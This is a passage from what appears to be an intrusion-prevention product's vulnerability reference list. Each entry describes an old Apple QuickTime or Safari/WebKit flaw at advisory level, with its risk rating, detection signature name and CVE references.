Last changed: sgpkg-ips-1296-5242
Platform: Windows;Mac OS X
Software: Apple QuickTime
Type: Insecure Configuration
Description: A vulnerability exists in Apple QuickTime when calling certain ActiveX functions.
Situation: File-Text_Apple-QuickTime-QTPlugin.ocx-ActiveX-Vulnerable-Function-Call
References:
CVE-2008-0778
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0778
BID-27769
http://www.securityfocus.com/bid/27769
OSVDB-41577
http://www.osvdb.org/41577
Back to top

Apple-QuickTime-QTVR-Qtvrstringatom-Parsing-Buffer-Overflow

About this vulnerability: A vulnerability in Apple Computer QuickTime
Risk: Moderate
First detected in: sgpkg-ips-503-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apple QuickTime
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Apple QuickTime. The vulnerability is due to a signedness error, which leads to a stack-based buffer overflow when processing a QTVR string atom having an overly large stringLength parameter. A remote attacker can exploit this vulnerability by enticing a user to download and process a specially crafted QuickTime VR file with the vulnerable software. This can lead to code execution in the context of the vulnerable application.
Situation: File-MPEG_Apple-QuickTime-QTVR-Qtvrstringatom-Parsing-Buffer-Overflow
References:
CVE-2012-0667
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0667
BID-53583
http://www.securityfocus.com/bid/53583
OSVDB-81938
http://www.osvdb.org/81938
Back to top

Apple-QuickTime-Rnet-Box-Parsing-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Apple Computer QuickTime
Risk: Moderate
First detected in: sgpkg-ips-499-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apple QuickTime
Type: Buffer Overflow
Description: There is a heap buffer overflow vulnerability in Apple QuickTime. The vulnerability is due to a bounds-checking error while parsing 'rnet' atom in QuickTime reference movie files. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user to process a maliciously crafted QuickTime reference movie file. This can lead to code execution in the context of the affected user. If code execution is unsuccessful, a denial of service condition may result.
Situation: File-MPEG_Apple-QuickTime-Rnet-Box-Parsing-Heap-Buffer-Overflow
References:
CVE-2012-3756
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3756
BID-56438
http://www.securityfocus.com/bid/56438
OSVDB-87091
http://www.osvdb.org/87091
Back to top

Apple-QuickTime-RTSP-Response-Crafted-Content-Type-Header-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in Apple QuickTime
Risk: High
First detected in: sgpkg-ips-132-2032
Last changed: sgpkg-ips-1555-5242
Platform: Windows; Mac OS X
Software: Apple QuickTime
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Apple QuickTime. The vulnerability lies in the Real Time Streaming Protocol (RTSP) protocol support in the QuickTime.The flaw is due to a boundary error when parsing a crafted Content-Type header. A remote attacker can exploiting this vulnerability by enticing the target user to visit a malicious web site. Successful attack could allow for arbitrary code injection and execution with the privileges of the currently logged on user.
References:
CVE-2007-6166
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6166
BID-26549
http://www.securityfocus.com/bid/26549
Back to top

Apple-QuickTime-SMIL-File-Handling-Integer-Overflow

About this vulnerability: An integer overflow vulnerability in Apple QuickTime
Risk: High
First detected in: sgpkg-ips-130-2032
Last changed: sgpkg-ips-1555-5242
Platform: Windows; Mac OS
Software: Apple QuickTime
Type: Integer Overflow
Description: There is an integer overflow vulnerability in Apple QuickTime. The vulnerability is due to the way QuickTime parses specially crafted SMIL documents. A remote attacker could exploit this vulnerability by persuading a user to open a specially crafted SMIL file or access a malicious web page, potentially causing arbitrary code to be injected and executed in the security context of the logged in user.
Situation: HTTP_SS-Apple-QuickTime-SMIL-File-Handling-Integer-Overflow
References:
CVE-2007-2394
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2394
BID-24873
http://www.securityfocus.com/bid/24873
OSVDB-36134
http://www.osvdb.org/36134
Back to top

Apple-QuickTime-Streaming-Debug-Error-Logging-Buffer-Overflow

About this vulnerability: An attempt to exploit vulnerability in Apple QuickTime detected
Risk: Moderate
First detected in: sgpkg-ips-405-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apple QuickTime
Type: Buffer Overflow
Description: A stack buffer overflow vulnerability exists in Apple QuickTime media player. The vulnerability is due to a boundary error in the QuickTimeStreaming.qtx file while writing a debug log error. Remote attackers could exploit this vulnerability by enticing target users to open a crafted SMIL file containing an overly long URL.
Situation: HTTP_SS-Apple-QuickTime-Streaming-Debug-Error-Logging-Buffer-Overflow
File-TextId_Apple-QuickTime-Streaming-Debug-Error-Logging-Buffer-Overflow
References:
CVE-2010-1799
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1799
BID-41962
http://www.securityfocus.com/bid/41962
OSVDB-66636
http://www.osvdb.org/66636
Back to top

Apple-QuickTime-Stsc-Heap-Overflow

About this vulnerability: A vulnerability in Apple QuickTime
Risk: High
First detected in: sgpkg-ips-418-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apple QuickTime
Type: Buffer Overflow
Description: There is a vulnerability in the media file parser in Apple QuickTime. A remote attacker can execute arbitrary code on the victim's computer in the context of the victim user when they open a malicious QuickTime file.
Situation: File-MPEG_Apple-QuickTime-Stsc-Heap-Overflow
References:
CVE-2004-0431
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0431
Back to top

Apple-QuickTime-Stsd-Atoms-Handling-Heap-Overflow

About this vulnerability: A vulnerability in Apple Computer QuickTime
Risk: Moderate
First detected in: sgpkg-ips-999-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apple QuickTime
Type: Malfunction
Description: There exists a buffer overflow vulnerability in Apple QuickTime.
Situation: File-MPEG_Apple-QuickTime-Stsd-Atoms-Handling-Heap-Overflow
References:
CVE-2007-3750
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3750
Back to top

Apple-QuickTime-Targa-File-Buffer-Overflow

About this vulnerability: A vulnerability in Apple Computer QuickTime
Risk: High
First detected in: sgpkg-ips-494-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apple QuickTime
Type: Buffer Overflow
Description: A buffer overflow vulnerability has been reported in Apple QuickTime. The vulnerability is due to a bounds-checking error while parsing Targa files. A remote attacker can exploit this vulnerability by enticing a user to process a maliciously crafted Targa file. This can lead to code execution in the context of the affected user. If code execution is unsuccessful, a denial of service condition may result.
Situation: File-Binary_Apple-QuickTime-Targa-File-Buffer-Overflow
References:
CVE-2012-3755
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3755
BID-56438
http://www.securityfocus.com/bid/56438
OSVDB-87090
http://www.osvdb.org/87090
Back to top

Apple-QuickTime-Texml-Color-String-Parsing-Buffer-Overflow

About this vulnerability: A vulnerability in Apple Computer Quicktime
Risk: High
First detected in: sgpkg-ips-463-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apple QuickTime
Type: Buffer Overflow
Description: There is a stack buffer overflow vulnerability in Apple QuickTime. The vulnerability is due to insufficient validation of a string length when processing the color-related sub elements of a Style element, and color-related attributes of description, sampleData and karaoke elements inside QuickTime TeXML files. A remote attacker can exploit this vulnerability by enticing a user to download and process a specially crafted TeXML file with the vulnerable software. This can lead to code execution in the context of the vulnerable application.
Situation: File-TextId_Apple-QuickTime-Texml-Color-String-Parsing-Buffer-Overflow
References:
CVE-2012-0663
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0663
BID-53571
http://www.securityfocus.com/bid/53571
OSVDB-81934
http://www.osvdb.org/81934
Back to top

Apple-QuickTime-Texml-Style-Element-Text-Specification-BOF

About this vulnerability: A vulnerability in Apple Computer Quicktime
Risk: High
First detected in: sgpkg-ips-492-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apple QuickTime
Type: Buffer Overflow
Description: A buffer overflow vulnerability has been reported in Apple QuickTime. The vulnerability is due to insufficient bounds checking while parsing style elements in QuickTime TeXML files. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user to process a maliciously crafted TeXML file. This can lead to code execution in the context of the affected user. If code execution is unsuccessful, a denial of service condition may result.
Situation: File-TextId_Apple-QuickTime-Texml-Style-Element-Text-Specification-BOF
References:
CVE-2012-3752
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3752
BID-56438
http://www.securityfocus.com/bid/56438
Back to top

Apple-QuickTime-Texml-Textbox-Element-Memory-Corruption

About this vulnerability: A vulnerability in Apple Computer QuickTime
Risk: Moderate
First detected in: sgpkg-ips-529-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apple QuickTime
Type: Malfunction
Description: There is a memory corruption vulnerability in Apple QuickTime. The vulnerability is due to insufficient validation of coordinate values in textBox and defaultTextBox in QuickTime TeXML files. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user to process a maliciously crafted TeXML file. This can lead to code execution in the context of the affected user. If code execution is unsuccessful, a denial of service condition may result.
Situation: File-TextId_Apple-QuickTime-Texml-Textbox-Element-Memory-Corruption
References:
CVE-2013-1015
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1015
OSVDB-93615
http://www.osvdb.org/93615
Back to top

Apple-QuickTime-Texml-Transform-Attribute-Parsing-Buffer-Overflow

About this vulnerability: A vulnerability in Apple Computer Quicktime
Risk: Moderate
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apple QuickTime
Type: Buffer Overflow
Description: There is a stack buffer overflow vulnerability in Apple QuickTime. The vulnerability is due to insufficient validation of a string length in QuickTime3GPP.qtx when processing the transform attribute inside QuickTime TeXML files. A remote attacker can exploit this vulnerability by enticing a user to download and process a specially crafted TeXML file with the vulnerable software. This can lead to code execution in the context of the vulnerable application.
Situation: File-TextId_Apple-QuickTime-Texml-Transform-Attribute-Parsing-Buffer-Overflow
References:
CVE-2012-0663
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0663
BID-53571
http://www.securityfocus.com/bid/53571
OSVDB-81934
http://www.osvdb.org/81934
Back to top

Apple-QuickTime-Text-Track-Descriptors-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Apple QuickTime
Risk: High
First detected in: sgpkg-ips-461-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apple QuickTime
Type: Buffer Overflow
Description: There is a heap buffer overflow vulnerability in Apple Quicktime. The vulnerability is due to improper validation on parameter lengths of Text Track Descriptors. The overly long parameter can be copied by the vulnerable code into a fixed length heap buffer. This vulnerability can be exploited by a remote attacker by enticing the target user to open a specially crafted text track or movie file with the affected application. Successful exploitation could result in arbitrary code injection and execution in the context of the currently logged-in user.
Situation: File-TextId_Apple-QuickTime-Text-Track-Descriptors-Heap-Buffer-Overflow
References:
CVE-2012-0664
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0664
BID-53574
http://www.securityfocus.com/bid/53574
OSVDB-81935
http://www.osvdb.org/81935
Back to top

Apple-QuickTime-Traf-Atom-Out-Of-Bounds-Access

About this vulnerability: A vulnerability in Apple Computer Quicktime
Risk: High
First detected in: sgpkg-ips-677-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apple QuickTime
Type: Malfunction
Description: There exists an out-of-bounds memory access vulnerability in Apple QuickTime. The vulnerability can be used to execute arbitrary code or cause a denial of service condition.
Situation: File-MPEG_Apple-QuickTime-Traf-Atom-Out-Of-Bounds-Access
References:
CVE-2015-3668
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3668
Back to top

Apple-QuickTime-Udta-Atom-Buffer-Overflow

About this vulnerability: A vulnerability in Apple Quicktime
Risk: Moderate
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apple QuickTime; Apple iTunes
Type: Buffer Overflow
Description: There exists a heap buffer overflow vulnerability in Apple QuickTime. The flaw is caused by insufficient checks imposed on the value that defines the size of a udta Atom in a MOV file. This may lead to a heap buffer overflow, which may be exploited by an attacker to inject and execute arbitrary code in the security context of the currently logged in user. The behaviour of the affected application is fully dependent on the outcome of an attack attempt. In the case of an unsuccessful attack, the application will terminate. In the case where the flow of the vulnerable process is successfully diverted, the behaviour of the target host system is fully dependent on the intention of the supplied code. In the case where process flow is diverted as a result of an attack, the attacker supplied code will be executed with the privileges of the currently logged on user.
Situation: File-MPEG_Apple-QuickTime-Udta-Atom-Buffer-Overflow
References:
CVE-2006-1460
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1460
BID-17953
http://www.securityfocus.com/bid/17953
Back to top

Apple-QuickTime-Udta-Atom-Parsing-Heap-Overflow-Vulnerability

About this vulnerability: A heap overflow vulnerability in Apple QuickTime
Risk: High
First detected in: sgpkg-ips-100-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apple QuickTime
Type: Buffer Overflow
Description: There is a heap-based buffer overflow vulnerability in Apple QuickTime. The flaw is caused by improper parsing of forged size fields in user data Atoms (udta). By setting this field to an overly large value, an integer overflow occurs resulting in an exploitable heap overflow. Successful exploitation allows remote attackers to execute arbitrary code under the context of the currently logged-in user.
Situation: HTTP_Apple-QuickTime-Udta-Atom-Parsing-Heap-Overflow-Vulnerability
File-MPEG_Apple-QuickTime-Udta-Atom-Parsing-Heap-Overflow-Vulnerability
References:
CVE-2007-0714
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0714
BID-22844
http://www.securityfocus.com/bid/22844
OSVDB-33902
http://www.osvdb.org/33902
Back to top

Apple-QuickTime-Vr-Tkhd-Heap-Corruption

About this vulnerability: A vulnerability in Apple QuickTime
Risk: Moderate
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apple QuickTime
Type: Malfunction
Description: There exists a heap buffer memory corruption vulnerability in Apple QuickTime. The vulnerability is due to a logic error while processing the "VR Track Header" atoms in QuickTime movie files. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted QuickTime movie file. Successful exploitation may lead to arbitrary code execution in the security context of the logged in user. In an attack case where code injection is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the logged in user. In an attack case where code injection is not successful, the affected Apple QuickTime process will terminate abnormally.
Situation: File-MPEG_Apple-QuickTime-Vr-Tkhd-Atom-Heap-Corruption
References:
CVE-2009-0002
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0002
BID-33384
http://www.securityfocus.com/bid/33384
OSVDB-51525
http://www.osvdb.org/51525
Back to top

Apple-Safari-Arbitrary-Code-Execution

About this vulnerability: An Apple Safari Arbitrary Code Execution vulnerability.
Risk: Moderate
First detected in: sgpkg-ips-745-5211
Last changed: sgpkg-ips-1296-5242
Platform: OS X
Software: Safari
Type: Input Validation
Description: A vulnerability in Apple Safari, versions before 5.1.1, which allows remote attackers to execute arbitrary code via a crafted web site.
Situation: File-Text_Apple-Safari-Arbitrary-Code-Execution
References:
CVE-2011-3230
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3230
OSVDB-76389
http://www.osvdb.org/76389
Back to top

Apple-Safari-CSS-Format-Argument-Handling-Memory-Corruption

About this vulnerability: A vulnerability in Apple Safari
Risk: High
First detected in: sgpkg-ips-300-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows; Mac OS X
Software: Safari
Type: Malfunction
Description: There is a memory corruption vulnerability in Apple Safari. The vulnerability is due to an error while processing CSS format arguments. A remote attacker can exploit this vulnerability by enticing a target user to open a malicious web page with a vulnerable application, which may lead to code execution in the context of the current user.
Situation: HTTP_SS-Apple-Safari-CSS-Format-Argument-Handling-Memory-Corruption
File-Text_Apple-Safari-CSS-Format-Argument-Handling-Memory-Corruption
References:
CVE-2010-0046
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0046
BID-38684
http://www.securityfocus.com/bid/38684
Back to top

Apple-Safari-CSS-Style-Overflow-DOS

About this vulnerability: Overtly long CSS style string
Risk: Low
First detected in: sgpkg-ips-580-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Safari;Chrome
Type: Buffer Overflow
Description: A vulnerability in older Apple Webkit based browsers may cause denial of service when parsing overtly long CSS strings.
Situation: File-Text_Apple-Safari-CSS-Style-Overflow-DOS
Back to top

Apple-Safari-Desktop-File-Download

About this vulnerability: A vulnerability in Apple Safari for Windows
Risk: Low
First detected in: sgpkg-ips-157-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Safari
Type: Insecure Configuration
Description: There is a weakness in the default configuration of Apple Safari for Windows. The default configuration downloads files that are not handled by any particular application to the desktop without notification.
Situation: HTTP_CSU-Suspicious-Dynamic-Link-Library-Download-Request
Back to top

Apple-Safari-Feed-URI-Denial-of-Service

About this vulnerability: A vulnerability in Apple Safari
Risk: Moderate
First detected in: sgpkg-ips-579-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Safari
Type: Malfunction
Description: There is a denial of service vulnerbility in Apple Safari. The product fails to parse certain crafted URIs.
Situation: File-Text_Apple-Safari-Feed-URI-Denial-of-Service
References:
BID-24460
http://www.securityfocus.com/bid/24460
Back to top

Apple-Safari-For-Windows-Protocol-Handler-Command-Injection

About this vulnerability: Apple Safari for Windows Protocol Handler Command Injection Vulnerability.
Risk: High
First detected in: sgpkg-ips-677-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Safari
Type: Code Injection
Description: A vulnerability exists in Apple Safari for Windows 3 which allows remote attackers to execute arbitrary commands via shell metacharacters within the URI in the SRC of an IFRAME.
Situation: File-Text_Apple-Safari-For-Windows-Protocol-Handler-Command-Injection
References:
CVE-2007-3186
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3186
BID-24434
http://www.securityfocus.com/bid/24434
OSVDB-38542
http://www.osvdb.org/38542
Back to top

Apple-Safari-For-Windows-URL-Spoofing

About this vulnerability: Apple Safari for Windows URL Spoofing Vulnerability.
Risk: High
First detected in: sgpkg-ips-677-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Safari
Type: Browser
Description: A vulnerability exists in Apple Safari for Windows 3.1.1 which allows remote attackers to spoof the address bar and conduct fishing attacks using a specially crafted URL.
Situation: File-Text_Apple-Safari-For-Windows-URL-Spoofing
References:
CVE-2008-1999
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1999
OSVDB-44658
http://www.osvdb.org/44658
Back to top

Apple-Safari-HTML-Image-Element-Handling-Use-After-Free

About this vulnerability: A vulnerability in Apple Safari
Risk: High
First detected in: sgpkg-ips-298-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows; Mac OS X
Software: Safari
Type: Malfunction
Description: There is a memory corruption vulnerability in Apple Safari. The vulnerability is due to a use-after-free error when handling HTML image elements. Remote attackers can exploit this vulnerability to execute arbitrary code on the target machine by enticing a user into opening a specially crafted HTML document.
Situation: HTTP_SS-Apple-Safari-HTML-Image-Element-Handling-Use-After-Free
File-Text_Apple-Safari-HTML-Image-Element-Handling-Use-After-Free
File-Text_Apple-Safari-HTML-Image-Element-Handling-Use-After-Free-3
File-Text_Apple-Safari-HTML-Image-Element-Handling-Use-After-Free-2
References:
CVE-2010-0054
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0054
BID-38691
http://www.securityfocus.com/bid/38691
OSVDB-62949
http://www.osvdb.org/62949
Back to top

Apple-Safari-IDN-Punycode-Canadian-Syllabics-URL-Spoofing

About this vulnerability: A vulnerability in Apple Safari
Risk: High
First detected in: sgpkg-ips-1494-5242
Last changed: sgpkg-ips-1494-5242
Platform: Generic
Software: Safari
Type: Malfunction
Description: A URL spoofing vulnerability has been reported in macOS Safari web browser. The vulnerability is due to lack of proper validation of user-supplied data. A remote attacker could exploit the vulnerability by enticing a victim to visit a crafted link or open a crafted file. A successful attack results in misleading message displayed in the address bar of the application and cause insecure actions.
Situation: File-Text_Apple-Safari-IDN-Punycode-Canadian-Syllabics-URL-Spoofing
References:
CVE-2022-32816
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32816
Back to top

Apple-Safari-Insecure-JavaScript-Usage

About this vulnerability: Safari Null Windows file reference Denial of Service
Risk: Moderate
First detected in: sgpkg-ips-581-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Safari
Type: Misconfiguration
Description: Certain javascript can cause a denial of service condition in older Apple Safari Browsers. E.g. including null file references in file:// -links or infinite document.write() -loops.
Situation: File-Text_Apple-Safari-Windows-JavaScript-Infinite-Document-Write
File-Text_Apple-Safari-Null-Windows-File-Reference-DoS
References:
CVE-2008-2001
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2001
OSVDB-44661
http://www.osvdb.org/44661
Back to top

Apple-Safari-JS-Multibyte-Char-Escape

About this vulnerability: Apple Webkit JS multibyte character escape sequence
Risk: Low
First detected in: sgpkg-ips-580-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Safari
Type: Insecure Configuration
Description: A vulnerability in older Apple Webkit based browsers may cause denial of service when using javascript escape on multibyte character strings.
Situation: File-Text_Apple-Safari-JS-Multibyte-Char-Escape
Back to top

Apple-Safari-KwqListIteratorImpl-DoS

About this vulnerability: Apple Webkit KwqListIteratorImpl() HTML Tag Handling Denial of Service
Risk: Low
First detected in: sgpkg-ips-580-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Safari
Type: Insecure Configuration
Description: A vulnerability in older Apple Webkit based browsers may cause a denial of service condition when long integers are used in table cellspacing attribute.
Situation: File-Text_Apple-Safari-KwqListIteratorImpl-DoS
References:
CVE-2006-1986
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1986
BID-17634
http://www.securityfocus.com/bid/17634
OSVDB-24823
http://www.osvdb.org/24823
Back to top

Apple-Safari-Objc-MsgSend-RTP-DoS

About this vulnerability: Safari objc_msgSend_rtp() Tag handling DoS
Risk: Moderate
First detected in: sgpkg-ips-581-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Safari
Type: Misconfiguration
Description: Multiple "scrolling" -attributes within a frame html tag. This may indicate an attack against Apple Safari browsers
Situation: File-Text_Apple-Safari-Objc-MsgSend-RTP-DoS
References:
CVE-2006-1987
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1987
BID-17634
http://www.securityfocus.com/bid/17634
Back to top

Apple-Safari-Parent.close-Code-Execution

About this vulnerability: A vulnerability in Apple Safari
Risk: Moderate
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Safari
Type: Malfunction
Description: A code execution vulnerability exists in Apple Safari. The vulnerability is due to an error while handling the termination and subsequent referencing between child and parent windows. Remote attackers can exploit this vulnerability to execute arbitrary code on the target machine by enticing a user into opening a specially crafted HTML document. Note that popup windows must be enabled in order to successfully exploit this vulnerability. In attack scenarios where code execution is successful the behaviour of the target machine would depend entirely on the intention of the injected code, which would run within the security context of the logged on user. In situations where code execution is not successful, the vulnerable application may terminate abnormally.
Situation: File-Text_Apple-Safari-Parent.close-Code-Execution
References:
CVE-2010-1939
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1939
BID-39990
http://www.securityfocus.com/bid/39990
OSVDB-64482
http://www.osvdb.org/64482
Back to top

Apple-Safari-Right-To-Left-Text-Rendering-Use-After-Free

About this vulnerability: A vulnerability in Apple Safari
Risk: High
First detected in: sgpkg-ips-298-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows; Mac OS X
Software: Safari
Type: Malfunction
Description: There is a memory corruption vulnerability in Apple Safari. The vulnerability is due to a use-after-free error when handling HTML elements containing right-to-left displayed text. Remote attackers can exploit this vulnerability to execute arbitrary code on the target machine by enticing a user into opening a specially crafted HTML document.
Situation: HTTP_SS-Apple-Safari-Right-To-Left-Text-Rendering-Use-After-Free
File-Text_Apple-Safari-Right-To-Left-Text-Rendering-Use-After-Free
References:
CVE-2010-0049
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0049
BID-38689
http://www.securityfocus.com/bid/38689
OSVDB-62942
http://www.osvdb.org/62942
Back to top

Apple-Safari-Url-Handling-Cross-Origin-Security-Bypass

About this vulnerability: A vulnerability in Apple Computer Safari
Risk: High
First detected in: sgpkg-ips-657-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Safari
Type: Input Validation
Description: A cross-origin security bypass vulnerability exists in Apple Safari. The vulnerability is due to improper decoding of URLs. A remote unauthenticated attacker could exploit this vulnerability by enticing a user into opening a specially crafted page. Successful exploitation could lead to stealing document cookies and domain and bypassing security restrictions which may lead to origin spoofing.
Situation: File-Text_Apple-Safari-Url-Handling-Cross-Origin-Security-Bypass
References:
CVE-2015-1126
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1126
BID-73977
http://www.securityfocus.com/bid/73977
Back to top

Apple-Safari-Webkit-Arbitrary-File-Creation

About this vulnerability: An Apple Safari Webkit Arbitrary File Creation vulnerability.
Risk: High
First detected in: sgpkg-ips-741-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Webkit
Type: Insecure Configuration
Description: A vulnerability in Apple Safari Webkit, versions before 5.0.6, which allows remote attackers to upload and execute arbitrary code via a crafted website.
Situation: File-Text_Apple-Safari-Webkit-Arbitrary-File-Creation
References:
CVE-2011-1774
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1774
OSVDB-74017
http://www.osvdb.org/74017
Back to top

Apple-Safari-Webkit-Attribute-Child-Removal-Code-Execution

About this vulnerability: A vulnerability in Apple Safari
Risk: Moderate
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Safari
Type: Malfunction
Description: A vulnerability has been reported in Apple Safari's WebKit that could allow remote attackers to execute arbitrary code on a vulnerable system. The vulnerability is due to the way the vulnerable application handles references to attribute objects and destroys them. Remote attackers could exploit this vulnerability by enticing the target user to open a maliciously crafted web page. Successful exploitation could result in execution of arbitrary code within the security context of the current user. An unsuccessful attempt will terminate the affected application abnormally.
Situation: File-Text_Apple-Safari-Webkit-Attribute-Child-Removal-Code-Execution
References:
CVE-2010-1119
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1119
BID-40642
http://www.securityfocus.com/bid/40642
Back to top

Apple-Safari-Webkit-Button-Column-Blocks-Memory-Corruption

About this vulnerability: A vulnerability in Apple Computer Safari
Risk: Moderate
First detected in: sgpkg-ips-826-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Safari
Type: Malfunction
Description: There exists a memory corruption vulnerability in Apple Safari.
Situation: File-Text_Apple-Safari-Webkit-Button-Column-Blocks-Memory-Corruption
References:
CVE-2012-1520
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1520
BID-54680
http://www.securityfocus.com/bid/54680
OSVDB-84139
http://www.osvdb.org/84139
Back to top

Apple-Safari-Webkit-Button-First-Letter-Style-Rendering-Code-Execution

About this vulnerability: A vulnerability in Apple Safari
Risk: High
First detected in: sgpkg-ips-377-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Safari
Type: Malfunction
Description: A code execution vulnerability exists in Apple Safari's Webkit.
Situation: HTTP_SS-Apple-Safari-Webkit-Button-First-Letter-Style-Rendering-Code-Execution
File-Text_Apple-Safari-Webkit-Button-First-Letter-Style-Rendering-Code-Execution
References:
CVE-2010-1392
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1392
BID-40644
http://www.securityfocus.com/bid/40644
Back to top

Apple-Safari-Webkit-CSS-Charset-Text-Transformation-Code-Execution

About this vulnerability: A vulnerability in Apple Safari
Risk: Moderate
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Safari
Type: Malfunction
Description: A vulnerability has been reported in Apple Safari's Webkit that could allow remote attackers to execute arbitrary code on a vulnerable system. The vulnerability is due to the way the vulnerable application handles text objects via CSS. Remote attackers could exploit this vulnerability by enticing the target user to open a maliciously crafted web page. Successful exploitation could result in execution of arbitrary code within the security context of the current user. An unsuccessful attempt will terminate the affected application abnormally.
Situation: File-Text_Apple-Safari-Webkit-CSS-Charset-Text-Transformation-Code-Execution
References:
CVE-2010-1770
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1770
BID-40620
http://www.securityfocus.com/bid/40620
Back to top

Apple-Safari-Webkit-CSS-Title-Memory-Corruption

About this vulnerability: A vulnerability in Apple Computer Safari
Risk: Moderate
First detected in: sgpkg-ips-863-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Safari
Type: Malfunction
Description: There exists a memory corruption vulnerability in Apple Safari. A remote, unauthenticated attacker can use this to execute arbitrary code on the affected system.
Situation: File-Text_Apple-Safari-Webkit-CSS-Title-Memory-Corruption
References:
CVE-2012-3684
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3684
OSVDB-85376
http://www.osvdb.org/85376
Back to top

Apple-Safari-Webkit-Floating-Point-Buffer-Overflow

About this vulnerability: A vulnerability in Apple Safari
Risk: High
First detected in: sgpkg-ips-241-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows; Mac OS X
Software: Safari
Type: Buffer Overflow
Description: There is a vulnerability in Apple's Webkit application programming interface, used in the Safari web browser. The vulnerability is due to incorrect parsing of floating point numbers. Remote attackers could exploit this vulnerability by enticing the target user to open a maliciously crafted web page. Successful exploitation results in execution of arbitrary code in the security context of the current user. An unsuccessful attempt may abnormally terminate the affected application.
Situation: HTTP_SS-Apple-Safari-Webkit-Floating-Point-Buffer-Overflow
